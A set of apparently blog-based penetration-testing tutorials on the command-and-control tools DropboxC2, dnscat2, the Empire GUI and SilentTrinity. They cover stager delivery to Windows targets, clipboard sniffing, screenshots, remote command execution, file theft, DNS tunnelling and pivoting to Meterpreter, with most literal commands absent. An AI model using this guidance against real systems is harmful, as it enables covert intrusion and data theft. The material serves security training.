Command and Control with DropboxC2

In this article, we will learn how to use DropboxC2 tool. It is also known as DBC2.

Table of Content:

  • Introduction
  • Installation
  • Getting Dropbox API
  • Exploiting Target
  • Sniffing Clipboard
  • Capturing Screenshot
  • Command Execution
  • File Download

Introduction                              

DBC2 is primarily a tool for post-exploitation. It has an agent running on the target’s machine, a controller, running on any machine, PowerShell modules, and Dropbox servers as a means of communication. It is inspired by the PowerShell Empire Framework. This tool is developed using python. The credit for developing this tool goes to Arno0x0x.

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin, first, we need the tool on our Attacker Machine. To do this, we will clone the tool directly from the GitHub.

After running the above command, we would have a directory created by the name of DBC2. Now, we will traverse inside that directory using the cd command. After that, we are going to need to install the dependencies of the tool. There are multiple ways to do this, but here we are using pip command along with a requirements.txt file that we cloned from git earlier.

Getting Dropbox API

Now, this tool uses the Dropbox Servers as the medium to run agents on the target machine. In order to do that, this tool requires a Dropbox API. To get that, first, create an account on Dropbox. Then after creating the account, head to developer tools here. A webpage will open similar to the one shown below. Here we will select the “Dropbox API”. Then in the type of access section, we will choose “App folder”. Name the app as per choice. Then click on Create App Button to proceed.

This will lead to another webpage as shown below. Here, move on to the O Auth 2 Section, and 

Generate access token. This will give the Dropbox API required for this particular practical.

Copy the Generated access token, now get to the directory we cloned earlier. Here we have a file named config.py. We will open it using nano command and paste the Access token as the value for “defaultAccessToken” as shown in the given screenshot given below.

Exploiting Target

Now, it’s time to run the tool, check for appropriate permission before running the tool. As we run the tool, we are greeted with a cool looking banner as shown in the given below. Followed by some details about the Author and Version and tool. After this, it will ask for a master password which will be used to encrypt all the data between the agents and the controller. Enter the password of choice. It will encrypt the password entered and display the result. We can copy the code shown and add to the config.py file so that it doesn’t ask again for a master password. After this, it will create an incoming directory inside the Directory we cloned earlier. This will be used as a buffer to save files from the target.

This tool requires to upload the modules and stager on Dropbox before proceeding further. We will do this using the command given below.

This will upload a file on the Dropbox as shown in the image given below. This file is encrypted using XOR encryption.

Now let’s check if the stage is published using the command given below:

Now that stage is uploaded, let’s use it to create a stager. We are going to create a batch file. But we can use many other types of stager options. This tool provides stager in macro, oneliner, JavaScript, MS build sct and much more. This command will create a stager.bat in the tmp directory. We sent this bat file to our target machine.

After the batch file is executed on the target machine, we will be informed with a message on the terminal that Agent found with ID. Now we will use the list command to see the list of the agents. And then we will copy the AgentID and then use it to interact with the session as shown in the given image.

This will create a file on the Dropbox with the .status extension as shown in the given image.

Clipboard Sniffing

We can get the clipboard data that the target has on its clipboard. That is., the data he/she has copied. To do this we will have to start a sniffer using the command clipboardLogger start. Then wait till the target copies some data. Then Stop the sniffer using the command clipboardLogger stop. After stopping the sniffer the clipboard will be saved in a text file inside the incoming directory.

Let’s take a look at what target copied on his/her machine. We are going to use the cat command on a new Kali terminal to read the file as shown in the given image.

Capturing Screenshot

Now furthermore we can grab a screenshot of then target machine. To do this we will use the screenshot command as shown in the given image.

The screenshot will be captured and stored in the incoming directory. We can see that the target is browsing a website on his/her machine in the given image.

Command Execution

We can run some PowerShell commands on the target machine using the parameter cmd. This tool doesn’t offer the shell but it can execute one command at a time. So, we type cmd and then it asks the command that is to be executed. Here we run the command dir. And we have the list of files as shown in the given image.

File Download

Furthermore, we can download files from the target. To do this we will have to use the command getFile followed by the file name or path. This will download the file form the target to our attacker machine.

The tool will download the file inside the incoming directory we discussed earlier. We can view the file using cat command as shown in the image given below.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

dnscat2: Command and Control over the DNS

In this article, we learn DNS tunneling through an amazing tool i.e. DNScat2

Table of Content :

  • Introduction to DNS
  • Introduction to DNScat
  • Installation
  • DNS tunneling
  • Conclusion

Introduction to DNS

The Domain Name System (DNS) associate’s URLs with their IP address. With DNS, it’s conceivable to type words rather than a series of numbers into a browser, enabling individuals to look for sites and send messages utilizing commonplace names. When you look for the domain name in a browser, it sends a question over to the DNS server to coordinate the domain with its IP. When found, it utilizes the IP to recover the site’s content. Most astonishingly, this entire procedure takes just milliseconds. For all this working, it uses port 53.

Introduction to DNScat

DNScat is such praised tool because it can create a command and control tunnel over the DNS protocol which lets an attacker work in stealth mode. You can access any data along with uploading and downloading files and to get a shell. For this tool to work over 53 port, you don’t need to have authoritative access to DNS server, you can just simply establish your connection over port 53 and it will be faster and it will still be sensed as usual traffic. But it makes its presence well known in the packet log.

DNScat is made of two components i.e. a server and a client. To know the working of dnscat, it is important to understand both of these components.

The client is intended to be kept running on a target machine. It’s written in C and has the least amount of the prerequisites. When you run the client, you regularly indicate a domain name. All packets will be sent to the local DNS server, which is then directed to the legitimate DNS server for that domain (which you, apparently, have control of).

The server is intended to be kept running on a definitive DNS server. It’s developed in ruby and relies upon a few distinct gems. When you run it, much like the client, you indicate from which domain(s) it listens to over 53. When it gets traffic for one of those domains, it endeavours to set up a legitimate association. It gets other traffic it will automatically disregard it but, however, it can also advance it upstream.

Installation

Run the following git command to download dnscat2 :

Now install bundler as it is a major dependency for dnscat2. To install bundler go into the server of dnscat2 and type :

Once everything is done, the server will run with the following command :

Similarly, download dnscat2 in the client machine too.  And use make command to compile it with the server, as shown in the image below :

To establish a connection between client and server, use the following command :

Once the connection is established, you can see on the server side that you will have a session as shown in the image below. You can use the command ‘sessions’ to check for a session that is created.

To interact with the said session type the following command :

As you can access the session now, use the word ‘ping’ to ping the target and if it replies ‘Pong!’ then you ping is successful.

Following will be the response on the client side of the ping command.

Further will the help command you can see all the options that we can use to our advantage. If you want to go to the shell then just type ‘shell’ and it will open a new window with the session to interact with the shell of the target system.

To interact with the shell session that is opened in a new terminal, type following set of commands :

Once you are in the session, you can execute any shell command like ‘uname -a’ as shown in the image above.

DNS Tunnelling

DNS tunnelling is the best attack through DNScat2. If through ifconfig you find two networks in your target system, as shown in the image below, you can easily perform DNS tunnelling.

For DNS tunnelling, type the following command :

Now you can try and connect to the SSH port with the following command :

Then, once connected, you can use ‘ifconfig’ command to see the network you have tunnelled for as shown in the following image :

As you have SSH control of the second network too, you can download DNScat2 in the said network too, in order to attack that network as well. Once you have downloaded DNScat2 in that network, type the following command to run it and have your session on the DNScat2 server :

Once the above command is executed, you will have a new session that you can access with the following set of commands :

And once you have access to the session, you can run any command.

And when further you use the systeminfo command, it will show you the details of the second system that you have gotten the access of through tunnelling.

Conclusion

Even in the most confined situations, DNS traffic ought to be permitted to determine inner or outside network. This can be utilized as a correspondence channel between an objective host and the command and control server. Command and information are contained inside DNS inquiries and identification that is why detection is troublesome since arbitrary command hides in plain sight due it being perceived as legitimate traffic. And this is exactly what DNSCat takes advantage of, making it a successful tool to attack.

AuthorSanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

Empire GUI: Graphical Interface to the Empire Post-Exploitation Framework

This is our 8th post in the series of the empire which covers how to use empire as GUI. Empire has a great GUI mechanism, but it’s still developing as it has been released just a while back. For empire GUI to work, we need to download all of its dependencies and this is where it gets a bit complicated. So, first of all, we will download the beta 3.0 version of empire as it’s the only version compatible with the GUI. Using the following commands:

Now run the following command as instructed on the GitHub page :

Now to install the beta version, type the following command :

Now to run empire use the following as it will link the command line to GUI version :

And as shown in the image below, the Empire will start.

Now, download the GUI of empire from GitHub using the following command :

Now that GUI of empire and the beta version of empire has been downloaded, we need to install its dependencies for it to work successfully. And for that, we will have to download nodejs first and to download it, type :

And in time, it will be installed as shown in the image below :

After nodejs, we have to download npm and for that type :

As its download, like in the image above, now run the following command in order to install it :

And then start the npm service, as shown in the image below, with the following command :

After all this, the GUI of empire will start as shown in the image below :

Moving further once the GUI of empire is up and running, create a stager and get an agent from the beta version of empire, while getting a session, remember to use port 1337 as that is the port the GUI works on.

Now, on the GUI, log in using your IP and port and other details as shown in the image below :

And as you will login, it will show you all the sessions you have, just like in the image below :

Here, all the shell commands will work as shown in the image above. As the GUI is still developing, we can’t use it for post exploitations. But it, it comes pretty handy in order to manage multiple sessions and it helps you understand it’s working better.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

Command & Control: Silenttrinity Post-Exploitation Agent

In this article, we will learn to use Silent Trinity tool to exploit windows.

Table of content:

  • Introduction
  • Installation
  • Windows exploitation
  • Windows post exploitation
  • Silent trinity to meterpreter

Introduction

Silent trinity is a command and control tool dedicated to windows. It is developed by byt3bl33d3r in python, iron python, C# and .net. as it is windows dedicated tool, C# was but obvious choice as it has a direct access .NET framework just like PowerShell. Its an amazing post exploitation tool for windows. This tool supports C2 server over HTTP 1.1.

Installation

Installing silent trinity is pretty easy as you just have to download it using git clone and then install its dependencies using pip command.  To download silent trinity, use the following command :

Now to install all the requirements using the following commands :

Once the installation is complete, start the said tool as shown in the image below :

Windows Exploitation

As the tool is up and running, use ‘list’ command to see the list of listeners available. As you can see in the image below only listeners are available i.e. http, and https. To start the listener, use the following set of commands :

When starting the listener, there is no need to give IP address or port as it automatically takes the IP of the local machine and the port is always pre-defined, depending on the listener, such as port 80 is specified for the listener http and port 443 is specified for the listener https. Now, as you can see that in the image below, with the help of the above commands our listener has started :

As we have done with the listeners, now comes the stagers. Similar to the listener, use the ‘list’ command to see the list of all the available listeners. Because this tool is a windows dedicated tool, there are only three stagers in relation to windows and they are msbuild, wmic, PowerShell. To launch the stager use the following set of commands :

Executing the above commands will create a file. Share that file to the target system using the python server as shown in the image below :

And now, run the file in the command prompt of the target system with the following command :

As the file is executed, you can see in the image below, a session will be generated.

Windows Post Exploitation

As the session is generated, you can again use the ‘list’ command to see the list of post exploitation modules available, some of which we will show in our article, as shown in the image below :

Let’s try and use the message box. The purpose of this exploit is to pop a message on the victim’s PC. To use this exploit run the following set of commands :

And as the result of the said exploit, a message box will pop up on the target machine. You can see the message box in the image below :

The next exploit is to receive basic information about the target system. And for his, type the following set of commands :

There is a module for enumeration of host and to run that module type the following set of commands :

As you can see you have catalogues and detailed information about your target system in the image below :

With the next exploit, you can access shell of the target system but command by command and for this type :

As shown in the image below, it runs the ipconfig command through the session that has access to.

Silent trinity to meterpreter

To have a meterpreter session via silent trinity start Metasploit by using msfconsole command in a new terminal. And use the web_delivery exploit using the following command :

Running the above commands will generate a command that is to be run in the target system as shown in the image below :

The above-generated command is to be run in the shell of the victim’s PC and for that execute the command in the shell by using silent trinity as we had run ipconfig command earlier. 

run <session name>

As the command will run in the silent trinity, you will have your meterpreter session as shown in the image below :

So, all in all, Silent trinity is an amazing tool when it comes to exploiting windows.

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiastContact Here